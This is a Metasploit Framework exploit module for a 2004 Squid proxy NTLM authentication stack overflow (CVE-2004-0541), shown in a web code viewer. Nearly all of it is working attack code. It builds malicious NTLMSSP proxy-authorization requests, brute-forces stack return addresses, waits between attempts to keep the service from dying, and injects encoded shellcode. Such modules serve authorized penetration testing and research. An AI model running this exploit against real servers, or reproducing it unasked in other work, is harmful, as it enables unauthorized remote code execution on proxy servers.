Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Brute

10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Squid NTLM Authenticate Overflow',

17
        'Description' => %q{

18
          This is an exploit for Squid\'s NTLM authenticate overflow

19
          (libntlmssp.c). Due to improper bounds checking in

20
          ntlm_check_auth, it is possible to overflow the 'pass'

21
          variable on the stack with user controlled data of a user

22
          defined length.  Props to iDEFENSE for the advisory.

23
        },

24
        'Author' => 'skape',

25
        'References' => [

26
          [ 'CVE', '2004-0541'],

27
          [ 'OSVDB', '6791'],

28
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],

29
          [ 'BID', '10500'],

30
        ],

31
        'Privileged' => false,

32
        'Payload' => {

33
          'Space' => 256,

34
          'MinNops' => 16,

35
          'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",

36
          'PrependEncoder' => "\x83\xec\x7f",

37


38
        },

39
        'Platform' => %w{linux},

40
        'Targets' => [

41
          [

42
            'Linux Bruteforce',

43
            {

44
              'Platform' => 'linux',

45
              'Bruteforce' =>

46
                {

47
                  'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },

48
                  'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },

49
                  'Step' => 0

50
                }

51
            },

52
          ],

53
        ],

54
        'DisclosureDate' => '2004-06-08',

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_advanced_options(

65
      [

66
        # We must wait 15 seconds between each attempt so as to prevent

67
        # squid from exiting completely after 5 crashes.

68
        OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),

69
      ]

70
    )

71
  end

72


73
  def brute_exploit(addresses)

74
    site = "http://" + rand_text_alpha(rand(128)) + ".com"

75


76
    print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")

77
    connect

78


79
    trasnmit_negotiate(site)

80
    transmit_authenticate(site, addresses)

81


82
    handler

83
    disconnect

84
  end

85


86
  def trasnmit_negotiate(site)

87
    negotiate =

88
      "NTLMSSP\x00" + # NTLMSSP identifier

89
      "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE

90
      "\x07\x00\xb2\x07" + # flags

91
      "\x01\x00\x09\x00" + # workgroup len/max       (1)

92
      "\x01\x00\x00\x00" + # workgroup offset        (1)

93
      "\x01\x00\x03\x00" + # workstation len/max     (1)

94
      "\x01\x00\x00\x00" # workstation offset      (1)

95


96
    print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")

97
    req =

98
      "GET #{site} HTTP/1.1\r\n" +

99
      "Proxy-Connection: Keep-Alive\r\n" +

100
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +

101
      "\r\n"

102
    sock.put(req)

103
  end

104


105
  def transmit_authenticate(site, addresses)

106
    overflow =

107
      rand_text_alphanumeric(0x20) +

108
      [addresses['Ret']].pack('V') +

109
      [addresses['Valid']].pack('V') +

110
      "\xff\x00\x00\x00"

111
    shellcode = payload.encoded

112
    pass_len = [overflow.length + shellcode.length].pack('v')

113
    authenticate =

114
      "NTLMSSP\x00" + # NTLMSSP identifier

115
      "\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE

116
      pass_len + pass_len + # lanman response len/max

117
      "\x38\x00\x00\x00" + # lanman response offset  (56)

118
      "\x01\x00\x01\x00" + # nt response len/max     (1)

119
      "\x01\x00\x00\x00" + # nt response offset      (1)

120
      "\x01\x00\x01\x00" + # domain name len/max     (1)

121
      "\x01\x00\x00\x00" + # domain name offset      (1)

122
      "\x01\x00\x01\x00" + # user name               (1)

123
      "\x01\x00\x00\x00" + # user name offset        (1)

124
      "\x00\x00\x00\x00" + # session key

125
      "\x8b\x00\x00\x00" + # session key

126
      "\x06\x82\x00\x02" + # flags

127
      overflow + shellcode

128


129
    print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")

130
    req =

131
      "GET #{site} HTTP/1.1\r\n" +

132
      "Proxy-Connection: Keep-Alive\r\n" +

133
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +

134
      "\r\n"

135
    sock.put(req)

136
  end

137
end

138


139